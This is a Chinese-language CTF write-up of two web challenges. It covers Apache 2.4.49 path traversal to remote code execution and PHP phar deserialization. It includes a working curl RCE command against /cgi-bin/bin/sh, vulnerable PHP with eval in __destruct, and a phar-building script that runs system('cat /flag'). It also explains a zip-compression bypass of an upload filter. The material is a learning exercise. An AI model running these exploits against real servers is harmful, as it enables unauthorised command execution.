
打开界面感觉这道题和上一个一样,有查询文件的功能,直接查询flag,签到提

打开界面各种看,源码啥都没有
然后抓包看一下配置,

搜一下有,2.4.49有目录遍及的漏洞,和以前做的一道题几乎一样
远程代码执行
curl -v --data "echo;id" 'http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

看见flag_is_here,以为就要成功了,可是怎么都得不到

内心想的是是不是故意给出flag的文件,然后真的却不在这里面呢
步骤没错,可是缺乏考虑,wp中说,这里制造了一个文件夹迷宫,仅存在四层
需要bp爆破,因为没环境不好构造,给出链接

额看到查询文件,就查一下源码
- ljt="ljt";
- $this->dky="dky"; phpinfo(); }
- public function __destruct()
- { if($this->ljt==="Misc"&&$this->dky==="Re") eval($this->cmd); }
- public function __wakeup(){ $this->ljt="Re"; $this->dky="Misc"; } }
- $file=$_POST['file']; if(isset($_POST['file']))
- { if (preg_match("/flag/i", $file)) { die("nonono"); }
-
- echo file_get_contents($file); }
感觉不太完整,也没反序列化,脑子里第一想的会不会是构建一个phar包,自动实现序列化这种
以上都是自己的分析,看完wp
- class LoveNss{
- public $ljt;
- public $dky;
- public $cmd;
- public function __construct(){
- $this->ljt="ljt";
- $this->dky="dky";
- phpinfo();
- }
- public function __destruct(){
- if($this->ljt==="Misc"&&$this->dky==="Re")
- eval($this->cmd);
- }
- public function __wakeup(){
- $this->ljt="Re";
- $this->dky="Misc";
- }
- }
- $file=$_POST['file'];
- if(isset($_POST['file'])){
- if (preg_match("/flag/i", $file)) {
- die("nonono");
- }
- echo file_get_contents($file);
- }
为什么我的不是完整的呢,可能在源码完整。
if($this->ljt==="Misc"&&$this->dky==="Re")这样那肯定,就是
lit=Misc dky=Re
public function __construct(){
$this->ljt="ljt";
$this->dky="dky";
phpinfo();
}这里面构建就会出现,而反序列化会在后面赋值覆盖掉
public function __wakeup(){
$this->ljt="Re";
$this->dky="Misc";
}这里冲突,应该会绕过wakeup,大于属性个数,
这样看就是构造phar包
- unlink('phar.phar');
- class LoveNss{
- public $ljt;
- public $dky;
- public $cmd;
- }
-
- $a=new LoveNss();
- $a->cmd="system('cat /flag');";
- $a->ljt="Misc";
- $a->dky="Re";
- $phar = new Phar('phar.phar');
- $phar->setStub('GIF89a'.'');
- $phar->setMetadata($a);
- $phar->addFromString('1.txt','dky');
- ?>
然后phar访问
- if ($_FILES["file"]["error"] > 0){
- echo "上传异常";
- }
- else{
- $allowedExts = array("gif", "jpeg", "jpg", "png");
- $temp = explode(".", $_FILES["file"]["name"]);
- $extension = end($temp);
- if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
- $content=file_get_contents($_FILES["file"]["tmp_name"]);
- $pos = strpos($content, "__HALT_COMPILER();");
- if(gettype($pos)==="integer"){
- echo "ltj一眼就发现了phar";
- }else{
- if (file_exists("./upload/" . $_FILES["file"]["name"])){
- echo $_FILES["file"]["name"] . " 文件已经存在";
- }else{
- $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
- fwrite($myfile, $content);
- fclose($myfile);
- echo "上传成功 ./upload/".$_FILES["file"]["name"];
- }
- }
- }else{
- echo "dky不喜欢这个文件 .".$extension;
- }
- }
- ?>
后缀必须是图片,且内容不能出现phar标志
可以压缩zip绕过
$phar = new Phar('phar.phar');来判断文件的名称
上传后用phar伪协议读取,格式phar://文件上传的路径.phar.phar 自己设置的名称
